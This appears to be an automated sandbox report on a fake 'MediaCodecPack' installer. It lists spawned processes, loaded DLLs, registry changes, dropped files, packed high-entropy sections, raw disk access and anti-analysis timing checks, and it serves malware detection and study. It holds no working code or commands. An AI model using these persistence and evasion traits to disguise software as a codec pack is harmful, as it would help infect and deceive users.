                    Source: mediacodecpack.exe, 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7LIEI.tmp.1.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: mediacodecpack.exe, mediacodecpack.exe, 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7LIEI.tmp.1.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: newwork.exe.1.exeReversingLabs: Detection: 15%
                    Source: newwork.exe.1.exeString found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
                    Source: newwork.exe.1.exeString found in binary or memory: /LOADINF="filename"
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeFile read: C:\Users\user\Desktop\newwork.exe.1.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\newwork.exe.1.exe "C:\Users\user\Desktop\newwork.exe.1.exe"
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeProcess created: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp "C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp" /SL5="$1041E,3065697,56832,C:\Users\user\Desktop\newwork.exe.1.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpProcess created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe "C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe" -i
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeProcess created: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp "C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp" /SL5="$1041E,3065697,56832,C:\Users\user\Desktop\newwork.exe.1.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpProcess created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe "C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe" -iJump to behavior
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: msacm32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: riched20.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: usp10.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: msls31.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: sfc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: sqlite3.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpWindow found: window name: TMainFormJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MediaCodecPack_is1Jump to behavior
                    Source: newwork.exe.1.exeStatic file information: File size 3314669 > 1048576
                    Source: Binary string: msvcp71.pdbx# source: is-NF7R8.tmp.1.dr
                    Source: Binary string: msvcr71.pdb< source: is-R0E3S.tmp.1.dr
                    Source: Binary string: msvcp71.pdb source: is-NF7R8.tmp.1.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-2R56A.tmp.1.dr
                    Source: Binary string: msvcr71.pdb source: is-R0E3S.tmp.1.dr

Data Obfuscation

Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Unpacked PE file: 2.2.mediacodecpack.exe.400000.0.unpack .aitt4:ER;.ajtt4:R;.aktt4:W;.rsrc:R;.altt4:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Unpacked PE file: 2.2.mediacodecpack.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .aitt4
Source: mediacodecpack.exe.1.dr | Static PE information: section name: .aitt4
Source: mediacodecpack.exe.1.dr | Static PE information: section name: .ajtt4
Source: mediacodecpack.exe.1.dr | Static PE information: section name: .aktt4
Source: mediacodecpack.exe.1.dr | Static PE information: section name: .altt4
Source: is-2R56A.tmp.1.dr | Static PE information: section name: Shared
Source: is-7LIEI.tmp.1.dr | Static PE information: section name: /4
Source: is-7LIEI.tmp.1.dr | Static PE information: section name: /19
Source: is-7LIEI.tmp.1.dr | Static PE information: section name: /35
Source: is-7LIEI.tmp.1.dr | Static PE information: section name: /51
Source: is-7LIEI.tmp.1.dr | Static PE information: section name: /63
Source: is-7LIEI.tmp.1.dr | Static PE information: section name: /77
Source: is-7LIEI.tmp.1.dr | Static PE information: section name: /89
Source: is-7LIEI.tmp.1.dr | Static PE information: section name: /102
Source: is-7LIEI.tmp.1.dr | Static PE information: section name: /113
Source: is-7LIEI.tmp.1.dr | Static PE information: section name: /124
Source: MediaCodecPack.exe.2.dr | Static PE information: section name: .aitt4
Source: MediaCodecPack.exe.2.dr | Static PE information: section name: .ajtt4
Source: MediaCodecPack.exe.2.dr | Static PE information: section name: .aktt4
Source: MediaCodecPack.exe.2.dr | Static PE information: section name: .altt4
Source: sqlite3.dll.2.dr | Static PE information: section name: /4
Source: sqlite3.dll.2.dr | Static PE information: section name: /19
Source: sqlite3.dll.2.dr | Static PE information: section name: /35
Source: sqlite3.dll.2.dr | Static PE information: section name: /51
Source: sqlite3.dll.2.dr | Static PE information: section name: /63
Source: sqlite3.dll.2.dr | Static PE information: section name: /77
Source: sqlite3.dll.2.dr | Static PE information: section name: /89
Source: sqlite3.dll.2.dr | Static PE information: section name: /102
Source: sqlite3.dll.2.dr | Static PE information: section name: /113
Source: sqlite3.dll.2.dr | Static PE information: section name: /124
Source: C:\Users\user\Desktop\newwork.exe.1.exe | Code function: 0_2_004065C8 push 00406605h; ret 0_2_004065FD
Source: C:\Users\user\Desktop\newwork.exe.1.exe | Code function: 0_2_004040B5 push eax; ret 0_2_004040F1
Source: C:\Users\user\Desktop\newwork.exe.1.exe | Code function: 0_2_00408104 push ecx; mov dword ptr [esp], eax 0_2_00408109
Source: C:\Users\user\Desktop\newwork.exe.1.exe | Code function: 0_2_00404185 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\newwork.exe.1.exe | Code function: 0_2_00404206 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\newwork.exe.1.exe | Code function: 0_2_0040C218 push eax; ret 0_2_0040C219
Source: C:\Users\user\Desktop\newwork.exe.1.exe | Code function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\newwork.exe.1.exe | Code function: 0_2_00404283 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\newwork.exe.1.exe | Code function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_0040994C push 00409989h; ret 1_2_00409981
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_00483F88 push 00484096h; ret 1_2_0048408E
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_004062B4 push ecx; mov dword ptr [esp], eax 1_2_004062B5
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_004104E0 push ecx; mov dword ptr [esp], edx 1_2_004104E5
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_00412928 push 0041298Bh; ret 1_2_00412983
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_00494CAC push ecx; mov dword ptr [esp], ecx 1_2_00494CB1
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_0040CE38 push ecx; mov dword ptr [esp], edx 1_2_0040CE3A
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_004592D0 push 00459314h; ret 1_2_0045930C
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_0040F398 push ecx; mov dword ptr [esp], edx 1_2_0040F39A
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_00443440 push ecx; mov dword ptr [esp], ecx 1_2_00443444
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_0040546D push eax; ret 1_2_004054A9
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_0040553D push 00405749h; ret 1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_004055BE push 00405749h; ret 1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_00485678 push ecx; mov dword ptr [esp], ecx 1_2_0048567D
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_0040563B push 00405749h; ret 1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_004517F8 push 0045182Bh; ret 1_2_00451823
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_004519BC push ecx; mov dword ptr [esp], eax 1_2_004519C1
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_00477B08 push ecx; mov dword ptr [esp], edx 1_2_00477B09
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_00419C28 push ecx; mov dword ptr [esp], ecx 1_2_00419C2D
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_0045FD1C push ecx; mov dword ptr [esp], ecx 1_2_0045FD20
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | Code function: 1_2_00499D30 pushad ; retf 1_2_00499D3F
Source: mediacodecpack.exe.1.dr | Static PE information: section name: .aitt4 entropy: 7.74249878627152
Source: MediaCodecPack.exe.2.dr | Static PE information: section name: .aitt4 entropy: 7.74249878627152

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 2_2_00B0E8A7
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-NF7R8.tmp
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-7LIEI.tmp
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-R0E3S.tmp
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-RNN6Q.tmp
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-2R56A.tmp
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | File created: C:\Users\user\AppData\Local\Temp\is-SKUV2.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\uninstall\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | File created: C:\ProgramData\MediaCodecPack\MediaCodecPack.exe
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | File created: C:\Users\user\AppData\Local\Temp\is-SKUV2.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcp71.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\sqlite3.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\Temp\is-SKUV2.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeFile created: C:\ProgramData\MediaCodecPack\sqlite3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\uninstall\is-F7SVI.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\gdiplus.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcr71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeFile created: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeFile created: C:\ProgramData\MediaCodecPack\MediaCodecPack.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeFile created: C:\ProgramData\MediaCodecPack\sqlite3.dllJump to dropped file

                    Boot Survival

                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 (2_2_00B0E8A7)
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_00401C49 StartServiceCtrlDispatcherA,2_2_00401C49
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Code function: 1_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C0C
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Code function: 1_2_004241DC IsIconic,SetActiveWindow,SetFocus,1_2_004241DC
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Code function: 1_2_00424194 IsIconic,SetActiveWindow,1_2_00424194
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Code function: 1_2_00418384 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,1_2_00418384
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Code function: 1_2_0042285C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,1_2_0042285C
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Code function: 1_2_00417598 IsIconic,GetCapture,1_2_00417598
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Code function: 1_2_0048393C IsIconic,GetWindowLongA,ShowWindow,ShowWindow,1_2_0048393C
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Code function: 1_2_00417CCE IsIconic,SetWindowPos,1_2_00417CCE
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Code function: 1_2_00417CD0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,1_2_00417CD0
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Code function: 1_2_0041F118 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,1_2_0041F118
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe -- Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_60920C91 rdtsc 2_2_60920C91
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,2_2_00B0E9AB
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-NF7R8.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-7LIEI.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-R0E3S.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-RNN6Q.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-2R56A.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\uninstall\unins000.exe (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SKUV2.tmp\_isetup\_shfoldr.dll
